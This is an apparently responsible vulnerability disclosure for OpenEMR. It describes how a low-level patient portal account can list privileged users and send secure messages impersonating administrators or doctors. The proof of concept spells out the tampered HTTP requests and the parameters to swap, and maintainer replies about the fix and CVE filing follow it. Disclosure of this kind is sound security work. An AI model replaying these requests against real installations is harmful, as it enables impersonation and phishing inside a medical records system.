Missing Authorization Check Allows Impersonated Secure Messages in openemr/openemr
Reported on
Feb 27th 2023
Description
Due to the lack of an authorization check when sending secure messages, an attacker with access to a low level patient account in the portal can impersonate other users when sending secure messages. This would allow a malicious actor to impersonate high-level users (administrators/doctors) when sending secure messages and can lead to legitimate looking social engineering and phishing attacks.
Proof of Concept
Step 1. Login to the patient portal using a low-level patient account
Step 2. Using a tool such as BurpSuite, capture the following request and view it's response. The response will contain important account information about privileged users and their accounts.
# Request
POST /openemr/portal/messaging/secure_chat.php?action=authusers HTTP/1.1
Host: demo.openemr.io
(...snippet...)
Te: trailers
Connection: close
#Response
HTTP/1.1 200 OK
Server: nginx/1.21.1
Date: Mon, 27 Feb 2023 02:47:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 367
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
[{"recip_id":"admin","dash":"1","username":"Billy Smith"},{"recip_id":"accountant","dash":"0","username":"Ernie Stent"},{"recip_id":"clinician","dash":"1","username":"Fred Stone"},{"recip_id":"physician","dash":"1","username":"Donna Lee"},{"recip_id":"receptionist","dash":"0","username":"Barbara Wallace"},{"recip_id":"zhportal","dash":"0","username":"Fred Jarvis"}]
Step 3. Now go to the 'My Messages' section and craft a test message. Send this test message and capture the request using Burp.
Step 4. Replace the recipient_id, recipient_name, sender_id, sender_name parameters with information acquired from step 2. For example, send a message from the admin account to another high privileged user.
POST /openemr/portal/messaging/handle_note.php HTTP/1.1
Host: demo.openemr.io
Cookie: username=Phil%20Belford; PortalOpenEMR=hsQebSDBqentL5pi-I6T5MVvqPNCGTX4d7pODNoKqhoy5-K%2C
(...snippet...)
Content-Length: 255
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/portal/messaging/messages.php
(...snippet...)
Connection: close
title=Test&csrf_token_form=a6d7d772289b2d6083009d0dd9d6aab52da81ca5¬eid=&replyid=&recipient_id=physician&recipient_name=Donna+Lee&sender_id=admin&sender_name=Billy+Smith&task=add&inputBody=%3Cp%3EThis+is+a+test.%3C%2Fp%3E%0D%0A&pid=&submit=messages.php
Step 5. Release this altered request and the victim will receive your impersonated secure message. High-level users will receive this message in the "Secure Messages" section even if they do not usually have access to this feature. (A portal icon will appear in the top right corner of their screen)
Impact
An attacker could use this vulnerability to impersonate administrators and high-level users to conduct advanced phishing and social engineering attacks within the application.
This is fixed is in master branch at https://github.com/openemr/openemr/commit/3656bc88288957d68ba040cad2e5f9dbd1b607b1
@drew-sec, I am unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 in about 3-4 weeks, which will include this fix. At that time (after release OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a cve).
thanks for the report @drew-sec !
Now that 7.0.1 has been released, can we please have the CVE filed for this vulnerability?
Hey @bradymiller, could I please get CVEs filed for the three vulnerabilities that I disclosed for OpenEMR? Thanks!
@admin, could I please have CVEs filed for the three vulnerabilities I reported for this project?
Hi Andrew, the maintainer can assign a CVE once it is marked as fixed & published.